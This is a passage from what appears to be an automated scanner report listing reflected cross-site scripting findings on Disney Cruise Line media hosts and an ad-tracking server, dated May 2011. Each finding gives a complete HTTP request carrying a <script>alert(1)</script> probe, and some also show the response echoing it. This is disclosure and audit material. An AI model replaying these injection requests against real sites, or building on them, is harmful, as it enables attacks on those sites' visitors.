Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /services/en_US61d5d<script>alert(1)</script>9f047ac3d3a/htmlQQ/jsQuickQuote?&qqElement=DisneyQuickQuote&qqPropKey=DCL2SQQProperties_BookingGenie_en_US&qqLoggedIn=false HTTP/1.1
Host: dcl.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
X-Cnection: Close
Content-Length: 162
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.5
Date: Mon, 16 May 2011 01:25:27 GMT
Connection: close
Vary: Accept-Encoding

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/services/en_US/en_US61d5d<script>alert(1)</script>9f047ac3d3a/htmlQQ/jsQuickQuote</BODY></HTML>

5.32. http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dcl.wdpromedia.com
Path:	/services/en_US/htmlQQ/jsQuickQuote

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b72b1<script>alert(1)</script>958bd4aec04 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/en_US/htmlQQb72b1<script>alert(1)</script>958bd4aec04/jsQuickQuote?&qqElement=DisneyQuickQuote&qqPropKey=DCL2SQQProperties_BookingGenie_en_US&qqLoggedIn=false HTTP/1.1
Host: dcl.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
X-Cnection: Close
Content-Length: 156
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.5
Date: Mon, 16 May 2011 01:25:33 GMT
Connection: close
Vary: Accept-Encoding

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/services/en_US/htmlQQb72b1<script>alert(1)</script>958bd4aec04/jsQuickQuote</BODY></HTML>

5.33. http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dcl.wdpromedia.com
Path:	/services/en_US/htmlQQ/jsQuickQuote

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5943d<script>alert(1)</script>ffb20f66d15 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/en_US/htmlQQ/jsQuickQuote5943d<script>alert(1)</script>ffb20f66d15?&qqElement=DisneyQuickQuote&qqPropKey=DCL2SQQProperties_BookingGenie_en_US&qqLoggedIn=false HTTP/1.1
Host: dcl.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
X-Cnection: Close
Content-Length: 156
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.5
Date: Mon, 16 May 2011 01:25:37 GMT
Connection: close
Vary: Accept-Encoding

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/services/en_US/htmlQQ/jsQuickQuote5943d<script>alert(1)</script>ffb20f66d15</BODY></HTML>

5.34. http://dcl2.wdpromedia.com/concat/4.39.1.5/css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dcl2.wdpromedia.com
Path:	/concat/4.39.1.5/css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac9cd"><script>alert(1)</script>170eaf02e31 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /concatac9cd"><script>alert(1)</script>170eaf02e31/4.39.1.5/css?files=/global/core.css,/global/visualStyles/main/main.css,/global/headers/globalHeader.css,/global/footers/globalFooter.css,/global/buttons/buttons.css,/global/main/sharedMain.css,/modules/billboardMedia.css,/modules/homepageFeaturesModule.css,/modules/quickQuote.css,/modules/homepage.css,/modules/infoBoxWide6.css,/modules/RolloverImageHyperlink.css,/modules/L1Overview.css,/modules/leftSubNavigation.css,/modules/funFactsAndTips.css,/modules/relatedItinerariesWide6.css,/modules/relatedContentFlourishBoxWide6.css HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

5.35. http://dcl2.wdpromedia.com/concat/4.39.1.5/css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dcl2.wdpromedia.com
Path:	/concat/4.39.1.5/css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c6ad"><script>alert(1)</script>4d3fe98385e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /concat/4.39.1.59c6ad"><script>alert(1)</script>4d3fe98385e/css?files=/global/core.css,/global/visualStyles/main/main.css,/global/headers/globalHeader.css,/global/footers/globalFooter.css,/global/buttons/buttons.css,/global/main/sharedMain.css,/modules/billboardMedia.css,/modules/homepageFeaturesModule.css,/modules/quickQuote.css,/modules/homepage.css,/modules/infoBoxWide6.css,/modules/RolloverImageHyperlink.css,/modules/L1Overview.css,/modules/leftSubNavigation.css,/modules/funFactsAndTips.css,/modules/relatedItinerariesWide6.css,/modules/relatedContentFlourishBoxWide6.css HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

5.36. http://dcl2.wdpromedia.com/concat/4.39.1.5/css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dcl2.wdpromedia.com
Path:	/concat/4.39.1.5/css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fdd5"><script>alert(1)</script>138273281c3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /concat/4.39.1.5/css1fdd5"><script>alert(1)</script>138273281c3?files=/global/core.css,/global/visualStyles/main/main.css,/global/headers/globalHeader.css,/global/footers/globalFooter.css,/global/buttons/buttons.css,/global/main/sharedMain.css,/modules/billboardMedia.css,/modules/homepageFeaturesModule.css,/modules/quickQuote.css,/modules/homepage.css,/modules/infoBoxWide6.css,/modules/RolloverImageHyperlink.css,/modules/L1Overview.css,/modules/leftSubNavigation.css,/modules/funFactsAndTips.css,/modules/relatedItinerariesWide6.css,/modules/relatedContentFlourishBoxWide6.css HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

5.37. http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/220x102/commerce-DVD.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dcl2.wdpromedia.com
Path:	/media/dcl_v0400/Global/Promo/220x102/commerce-DVD.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ae94"><script>alert(1)</script>eac3162730f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media3ae94"><script>alert(1)</script>eac3162730f/dcl_v0400/Global/Promo/220x102/commerce-DVD.png?t=1285273958056 HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

5.38. http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/220x102/commerce-SpecialOffers.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dcl2.wdpromedia.com
Path:	/media/dcl_v0400/Global/Promo/220x102/commerce-SpecialOffers.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ef40"><script>alert(1)</script>f5657d3ea61 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media1ef40"><script>alert(1)</script>f5657d3ea61/dcl_v0400/Global/Promo/220x102/commerce-SpecialOffers.png?t=1285273957650 HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

5.39. http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/220x102/content-Videos.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dcl2.wdpromedia.com
Path:	/media/dcl_v0400/Global/Promo/220x102/content-Videos.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1bc9"><script>alert(1)</script>077b2728ef3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediaa1bc9"><script>alert(1)</script>077b2728ef3/dcl_v0400/Global/Promo/220x102/content-Videos.png?t=1285273956040 HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

5.40. http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/906X46/visaFinancing2.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dcl2.wdpromedia.com
Path:	/media/dcl_v0400/Global/Promo/906X46/visaFinancing2.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9295a"><script>alert(1)</script>96a168aa4af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media9295a"><script>alert(1)</script>96a168aa4af/dcl_v0400/Global/Promo/906X46/visaFinancing2.png?t=1285940677233 HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

5.41. http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/DCL_VisaSave40_Tile_Link.jpg [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dcl2.wdpromedia.com
Path:	/media/dcl_v0400/Global/Promo/DCL_VisaSave40_Tile_Link.jpg

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ecb43"><script>alert(1)</script>40b5281772 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediaecb43"><script>alert(1)</script>40b5281772/dcl_v0400/Global/Promo/DCL_VisaSave40_Tile_Link.jpg?t=1278609104857 HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/special-offers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

5.42. http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/promoFreeDVD2010.jpg [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dcl2.wdpromedia.com
Path:	/media/dcl_v0400/Global/Promo/promoFreeDVD2010.jpg

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e44b7"><script>alert(1)</script>6eb83ba471b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediae44b7"><script>alert(1)</script>6eb83ba471b/dcl_v0400/Global/Promo/promoFreeDVD2010.jpg?t=1260481711585 HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/special-offers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

5.43. http://dcl2.wdpromedia.com/media/dcl_v0400/Global/globalHeader/logoDCL.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dcl2.wdpromedia.com
Path:	/media/dcl_v0400/Global/globalHeader/logoDCL.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ff92"><script>alert(1)</script>fd9c1d11d27 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media2ff92"><script>alert(1)</script>fd9c1d11d27/dcl_v0400/Global/globalHeader/logoDCL.png?t=1242662094147 HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

5.44. http://dcl2.wdpromedia.com/media/dcl_v0400/Site/DCLContent/Media/Assets/Home/Hero_904px_green.jpg [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dcl2.wdpromedia.com
Path:	/media/dcl_v0400/Site/DCLContent/Media/Assets/Home/Hero_904px_green.jpg

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9943"><script>alert(1)</script>da2cec6217b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediac9943"><script>alert(1)</script>da2cec6217b/dcl_v0400/Site/DCLContent/Media/Assets/Home/Hero_904px_green.jpg?t=1302109283890 HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

5.45. http://dcl2.wdpromedia.com/media/dcl_v0400/Site/DCLContent/Media/Assets/SpecialOffers/overview_904px.jpg [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dcl2.wdpromedia.com
Path:	/media/dcl_v0400/Site/DCLContent/Media/Assets/SpecialOffers/overview_904px.jpg

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e20d"><script>alert(1)</script>5087c26d2bb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media6e20d"><script>alert(1)</script>5087c26d2bb/dcl_v0400/Site/DCLContent/Media/Assets/SpecialOffers/overview_904px.jpg?t=1245453798364 HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/special-offers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

5.46. http://dcl2.wdpromedia.com/media/dcl_v0400/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dcl2.wdpromedia.com
Path:	/media/dcl_v0400/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92089"><script>alert(1)</script>c597bb81d5c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media92089"><script>alert(1)</script>c597bb81d5c/dcl_v0400/favicon.ico HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

5.47. http://dcl2.wdpromedia.com/reservations/concat/2.39.0.9/css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dcl2.wdpromedia.com
Path:	/reservations/concat/2.39.0.9/css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55aa9"><script>alert(1)</script>a9eabed6abe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /55aa9"><script>alert(1)</script>a9eabed6abe/concat/2.39.0.9/css?files=/global/print.css HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/reservations/customize?execution=e1s3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:36:08 GMT
Content-Length: 33443
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<link rel="canonical" href="http://disneycruise.disney.go.com/55aa9"><script>alert(1)</script>a9eabed6abe/concat/2.39.0.9/css" />
...[SNIP]...

5.48. http://dcl2.wdpromedia.com/reservations/concat/2.39.0.9/js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dcl2.wdpromedia.com
Path:	/reservations/concat/2.39.0.9/js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15880"><script>alert(1)</script>099c91ddff2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /15880"><script>alert(1)</script>099c91ddff2/concat/2.39.0.9/js?files=/global/loaderInit.js HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/reservations/customize?execution=e1s3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:36:12 GMT
Content-Length: 33442
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<link rel="canonical" href="http://disneycruise.disney.go.com/15880"><script>alert(1)</script>099c91ddff2/concat/2.39.0.9/js" />
...[SNIP]...

5.49. http://f.nexac.com/e/a-677/s-2140.xgi [na_kw parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://f.nexac.com
Path:	/e/a-677/s-2140.xgi

Issue detail

The value of the na_kw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19fb8"><script>alert(1)</script>ed9f7d4095b was submitted in the na_kw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /e/a-677/s-2140.xgi?na_random=516841224&na_url=http%3A//www.fingerhut.com/user/start_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dcrd10%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dstatic%26cm_mmc%3Dx1-_-mplus1-_-728x90-_-static&na_referrer=http%3A//ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest%3Bsz%3D728x90%3Bclick%3Dhttp%3A//bn.xp1.ru4.com/bclick%3F_f%3D8BWls1L7DgGK%26_o%3D15607%26_eo%3D747980%26_et%3D1305508796%26_a%3D1791737%26_s%3D0%26_d%3D1125798%26_pm%3D747980%26_pn%3D17918465%26redirect%3D%3Bu%3D17918465%3Bord%3D6394684%3F&na_title=Fingerhut%3A%20Credit%20Application&na_bksite=22&na_imsite=&na_iitaxid=&na_iicatid=&na_trncnv=mRn8Y3pPWrpy_yEEPuI6T0lqo5HPo1UDDYo9y1AT4qny6bqfWdNaY8CyzUjUE-oCYu1g8PP9mqMSB6Edtps_4g&na_trntrg=&na_trncrt=&na_ev=N&na_ct=0&na_kw=19fb8"><script>alert(1)</script>ed9f7d4095b HTTP/1.1
Host: f.nexac.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/user/start_credit_app.jsp?&CTid=471&CTKey=crd10&CTMedia=x1&CTProgType=mplus1&CTUnitSize=728x90&CTTestGrp=static&cm_mmc=x1-_-mplus1-_-728x90-_-static
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y

Response

HTTP/1.1 200 OK
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
Set-Cookie: na_id=2011051519270862126421219180; expires=Wed, 15-May-2013 01:33:37 GMT; path=/; domain=.nexac.com
Set-Cookie: na_lr=20110515; expires=Tue, 17-May-2011 07:33:37 GMT; path=/; domain=.nexac.com
Set-Cookie: na_ps=3; expires=Wed, 15-May-2013 01:33:37 GMT; path=/; domain=.nexac.com
X-Powered-By: Jigawatts
Content-type: text/html
Date: Mon, 16 May 2011 01:33:37 GMT
Server: lighttpd/1.4.18
Content-Length: 425

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
</head>
<body>

<iframe name="__bknsframe" src="http://tags.bluekai.com/psite/1846?partner=1&ret=html&uhint=na_id%3d2011051519270862126421219180&phint=__bk_t%3dFingerhut: Credit Application&phint=__bk_k%3d19fb8"><script>alert(1)</script>ed9f7d4095b&limit=4" height="0" width="0" frameborder="0">
...[SNIP]...

5.50. http://f.nexac.com/e/a-677/s-2140.xgi [na_title parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://f.nexac.com
Path:	/e/a-677/s-2140.xgi

Issue detail

The value of the na_title request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f09c"><script>alert(1)</script>b81aaeddec was submitted in the na_title parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /e/a-677/s-2140.xgi?na_random=516841224&na_url=http%3A//www.fingerhut.com/user/start_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dcrd10%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dstatic%26cm_mmc%3Dx1-_-mplus1-_-728x90-_-static&na_referrer=http%3A//ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest%3Bsz%3D728x90%3Bclick%3Dhttp%3A//bn.xp1.ru4.com/bclick%3F_f%3D8BWls1L7DgGK%26_o%3D15607%26_eo%3D747980%26_et%3D1305508796%26_a%3D1791737%26_s%3D0%26_d%3D1125798%26_pm%3D747980%26_pn%3D17918465%26redirect%3D%3Bu%3D17918465%3Bord%3D6394684%3F&na_title=4f09c"><script>alert(1)</script>b81aaeddec&na_bksite=22&na_imsite=&na_iitaxid=&na_iicatid=&na_trncnv=mRn8Y3pPWrpy_yEEPuI6T0lqo5HPo1UDDYo9y1AT4qny6bqfWdNaY8CyzUjUE-oCYu1g8PP9mqMSB6Edtps_4g&na_trntrg=&na_trncrt=&na_ev=N&na_ct=0&na_kw= HTTP/1.1
Host: f.nexac.com
Proxy-Connection: keep-alive
